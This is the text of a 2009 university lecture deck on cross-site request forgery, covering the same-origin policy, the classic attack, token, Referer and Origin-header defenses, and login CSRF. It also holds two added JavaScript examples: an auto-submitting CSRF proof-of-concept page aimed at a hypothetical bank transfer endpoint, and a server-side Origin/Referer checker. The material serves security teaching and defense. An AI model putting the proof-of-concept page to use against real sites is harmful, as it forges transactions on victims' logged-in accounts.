![Page 1: Cross-Site Request Forgery - psau.edu.sa · Cross-Site Request Forgery Collin Jackson 18732: Software Security Fall 2009 . Outline Same-Origin Policy Basic CSRF Existing Defenses](https://reader030.vdocument.in/reader030/viewer/2022040907/5e7ea388f6731422e20fdb18/html5/thumbnails/1.jpg)
Cross-Site Request Forgery
Collin Jackson 18732: Software Security Fall 2009
Outline
• Same-Origin Policy
• Basic CSRF
• Existing Defenses
• Proposed Defenses
• Advanced Attacks
SAME-ORIGIN POLICY
How does the browser isolate different sites?
Policy Goals
• Safe to visit an evil web site
• Safe to visit two pages at the same time
  • Address bar distinguishes them
• Allow safe delegation
Same Origin Policy
Origin = protocol://host:port *
Full access to same origin
• Network (XMLHttpRequest)
• Read/write DOM
• Storage?
Assumptions?
(diagram: Site A, with two Site A contexts sharing the same origin)
Same-Origin Policy for Storage
Same Origin Policy (SOP) for DOM:
• Origin A can access origin B's DOM if they match on (scheme, domain, port)
Same Origin Policy (SOP) for cookies:
• Generally speaking, based on ([scheme], domain, path); the scheme is optional (enforced only for cookies marked Secure), and the port is not part of the scope at all
URL anatomy: scheme://domain:port/path?params
Library import
  <script src=https://seal.verisign.com/getseal?host_name=a.com></script>
• Script runs with the privileges of the page that imports it, NOT of the server it is loaded from
• Can script other pages in this origin, load more scripts
• Other forms of importing
Data export
Many ways to send information to other origins:
  <form action="http://www.b.com/">
    <input name="data" type="hidden" value="hello">
  </form>
  <img src="http://www.b.com/?data=hello"/>
• No user involvement required
• Cannot read back response
BASIC CSRF
How can data export be abused?
Classic CSRF attack
User visits victim site
• Logs in
User loads attacker's site
• Or encounters attacker's iframe on another site
Attacker's page makes the browser send HTTP requests to the victim site
• Victim site assumes the requests originate from itself
Classic CSRF Attack
(diagram) The browser attaches the user's credentials to the forged request: Cookie: SessionID=523FA4cd2E
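The attacker page for the classic attack just described, as an added example that is not part of the slides. It builds the two cross-origin "data export" vectors the deck lists: a hidden form that submits itself on load (no click needed) and a plain image fetch for sites that change state on GET. The bank URL and form fields are hypothetical; the browser attaches the victim's cookies to either request, and the attacker never needs to read the response.

```javascript
// Added example (not from the slides): generating a CSRF proof-of-concept page.
// Target URL and field names are hypothetical.

// Escape a value for use inside a double-quoted HTML attribute, so attacker-
// controlled field values cannot break out of the generated markup.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// GET vector: any resource fetch will do; an <img> is the classic choice.
// Only works if the victim site performs the state change on GET.
function csrfGetVector(targetUrl, params) {
  const qs = new URLSearchParams(params).toString();
  const sep = targetUrl.includes('?') ? '&' : '?';
  return `<img src="${escapeAttr(targetUrl + sep + qs)}" alt="">`;
}

// POST vector: a hidden form that JavaScript submits as soon as the page loads,
// which is what "no user involvement required" means in practice.
function csrfPostPage(targetUrl, fields) {
  const inputs = Object.entries(fields)
    .map(([k, v]) => `<input type="hidden" name="${escapeAttr(k)}" value="${escapeAttr(v)}">`)
    .join('\n    ');
  return `<!doctype html>
<html><body>
  <form id="f" method="POST" action="${escapeAttr(targetUrl)}">
    ${inputs}
  </form>
  <script>document.getElementById('f').submit();</script>
</body></html>`;
}

// Usage: write the returned HTML to a file the victim is lured into opening.
const poc = csrfPostPage('https://bank.example/transfer', { to: 'attacker', amount: '1000' });
```

The POST page is the one to hand to a developer as evidence: it shows that a form on an unrelated origin, with the victim's session cookie riding along, is indistinguishable to the server from the site's own form unless one of the defenses below is in place.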
DEFENSES
CSRF Defenses
• Secret Validation Token: <input type=hidden value=23a3af01b>
• Referer Validation: Referer: http://www.facebook.com/home.php
• Custom HTTP Header: X-Requested-By: XMLHttpRequest
Secret Token Validation
Requests include a hard-to-guess secret
• Unguessable ≈ unforgeable
Linked to session cookie
• Overwriting token should not allow CSRF
Not equal to session cookie
• Leaking token should not compromise session
Suggestion: HMAC of session secret
See "Robust Defenses for Cross-Site Request Forgery" (Barth, Jackson and Mitchell, CCS 2008) for other options.
Secret Token Validation
Referer Validation
Referer Validation Defense
HTTP Referer header:
• Referer: http://www.facebook.com/ (same site: accept)
• Referer: http://www.attacker.com/evil.html (cross-site: reject)
• Referer: (missing: accept or reject?)
Lenient Referer validation: accept when the Referer is missing
• Doesn't work if Referer is missing
Strict Referer validation: reject when the Referer is missing
• Secure, but Referer is sometimes absent…
Referer Privacy Problems
Referer may leak privacy-sensitive information, e.g.
  http://intranet.corp.apple.com/projects/iphone/competitors.html
Common sources of blocking:
• Network stripping by the organization
• Network stripping by local machine
• Stripped by browser for HTTPS -> HTTP transitions
• User preference in browser
• Buggy user agents
Site cannot afford to block these users
Suppression Measurement (283,945 impressions)
Suppression over HTTPS is low
Lenient Validation Vulnerability
Problem: Browsers do not append Referer if the source of the request is not an HTTP page, e.g.
  ftp://attacker.com/attack.html
  data:text/html,<html>…</html>
  javascript:'<html>…</html>'
A lenient validator treats the missing Referer as "accept", so a forged request from such a page goes through.
Strict Validation Problems
Some sites allow users to post forms
• XSS sanitization doesn't include <form>, and a user-posted form submits from the site's own origin, so its Referer passes the check
• These sites need another defense
Many sites allow users to post hyperlinks
• Solution: Respect HTTP verb semantics
• GET requests have no side effects
• POST requests can change state
Custom Header Defense
XMLHttpRequest is for same-origin requests
• Can use setRequestHeader within origin
Limitations on data export format
• No setRequestHeader equivalent for forms, images and other cross-origin data export
• XHR2 has a whitelist for cross-site requests
Issue POST requests via AJAX with a custom header:
  X-Requested-By: XMLHttpRequest
Doesn't work across domains
Proposed Improvements
HTTP Origin Header
• Implemented in Google Chrome
• Identifies only the origin of requests
• Less likely to be blocked for privacy
• Sends more information for POST than for GET
• Experiment: Cross-domain POSTs out of firewall accounted for ~0.0001% of traffic
• Problem: Unsafe GET requests
• Problem: Third-party forms within an origin
• Question: How to handle redirects?
Alternative: Same-origin-only cookies
• Doesn't help multi-domain sites: amazon.com and amazon.co.uk
• Doesn't help third-party content problem
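A server-side source check covering both the Referer validation slides and the Origin header proposal above, as an added example that is not part of the slides. It prefers Origin when the browser sends it, falls back to Referer otherwise, and implements both the lenient and the strict policy so the `data:`/`ftp:`/`javascript:` case can be seen failing under the lenient one. `SITE_ORIGIN` and the request objects are assumptions; treating `Origin: null` (an opaque origin, which browsers send for data: pages, sandboxed frames and cross-origin redirects) as a cross-origin sender is this example's answer to the redirect question, not the deck's.

```javascript
// Added example (not from the slides): Origin/Referer source validation for
// state-changing requests. SITE_ORIGIN and request shapes are assumed.
const SITE_ORIGIN = 'https://www.example.com';

// Reduce a URL-valued header to scheme://host[:port]; null if absent or unparseable.
function parseOrigin(value) {
  if (typeof value !== 'string' || value === '') return null;
  try { return new URL(value).origin; } catch (_) { return null; }
}

// req = {method, headers} with lower-case header names, as Node delivers them.
// mode = 'strict' (reject when no source is known) or 'lenient' (accept).
function checkRequestSource(req, mode = 'strict') {
  // Respect HTTP verb semantics: GET/HEAD must have no side effects, so they
  // are not checked, and user-posted hyperlinks cannot do damage through them.
  if (req.method === 'GET' || req.method === 'HEAD') {
    return { allow: true, reason: 'safe method' };
  }
  const h = req.headers || {};

  // Origin carries only scheme/host/port, so it is less likely to be stripped
  // for privacy than Referer; when present it is authoritative. "null" is an
  // opaque origin and is never the site itself, so it is rejected rather than
  // treated as "missing".
  if (h.origin !== undefined) {
    return parseOrigin(h.origin) === SITE_ORIGIN
      ? { allow: true, reason: 'Origin matches' }
      : { allow: false, reason: 'Origin ' + h.origin + ' is not ' + SITE_ORIGIN };
  }

  // Clients without Origin: fall back to Referer. It is absent for requests
  // from ftp:, data: and javascript: pages, and when stripped by proxies,
  // the browser (HTTPS -> HTTP) or user preference.
  const ref = parseOrigin(h.referer);
  if (ref === null) {
    return mode === 'lenient'
      ? { allow: true, reason: 'no Referer; lenient policy accepts' }
      : { allow: false, reason: 'no Referer; strict policy rejects' };
  }
  return ref === SITE_ORIGIN
    ? { allow: true, reason: 'Referer matches' }
    : { allow: false, reason: 'Referer origin ' + ref + ' is not ' + SITE_ORIGIN };
}
```

The strict policy is the one the deck recommends over HTTPS, where the measurement slides show Referer suppression is low; the lenient branch is kept only to make the vulnerability explicit. Comparing whole origins rather than prefix-matching the header string avoids accepting a Referer such as `https://www.example.com.attacker.com/`.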
ADVANCED ATTACKS
Broader view of CSRF
Abuse of cross-site data export feature
• From user's browser to honest server
• Disrupts integrity of user's session
Why mount a CSRF attack?
• Network connectivity
• Read browser state
• Write browser state
Not just "session riding"
Login CSRF
(diagram) The forged request carries the attacker's credentials, so the victim's browser ends up logged in to the attacker's account
Payments Login CSRF
Rails vs. Login CSRF
Login CSRF Fails
Conclusion
Server-side defenses are required
• Secret token validation – use frameworks like Rails
• Referer validation – works over HTTPS
• Custom headers – for AJAX
No easy solution
• User does not need to have an existing session for attacks to work
• Hard to retrofit existing applications with defenses